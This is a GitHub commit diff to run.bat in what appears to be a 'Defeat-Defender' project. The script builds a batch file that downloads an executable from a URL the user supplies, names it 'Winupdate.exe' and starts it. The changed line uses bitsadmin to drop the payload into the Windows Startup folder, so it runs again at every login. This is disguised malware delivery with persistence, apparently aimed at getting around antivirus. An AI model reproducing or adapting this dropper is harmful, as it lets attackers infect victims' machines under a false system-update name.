Skip to content

Commit

Permalink
Update run.bat
Browse files Browse the repository at this point in the history
  • Loading branch information
Rdimo authored Oct 20, 2021
1 parent e448c19 commit 2a0c3b9
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion run.bat
Original file line number Diff line number Diff line change
Expand Up @@ -18,7 +18,7 @@ EXIT /B %ERRORLEVEL%
echo.
echo Your Url is : %a%
echo. >>Defeat-Defender.bat
echo powershell -command "start-bitstransfer %a% .\Winupdate.exe" >>Defeat-Defender.bat
echo bitsadmin /transfer Packages /download /priority foreground %a% "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Winupdate.exe" >>Defeat-Defender.bat
echo. >>Defeat-Defender.bat
echo start Winupdate.exe >>Defeat-Defender.bat
echo. >>Defeat-Defender.bat
Expand Down

0 comments on commit 2a0c3b9

Please sign in to comment.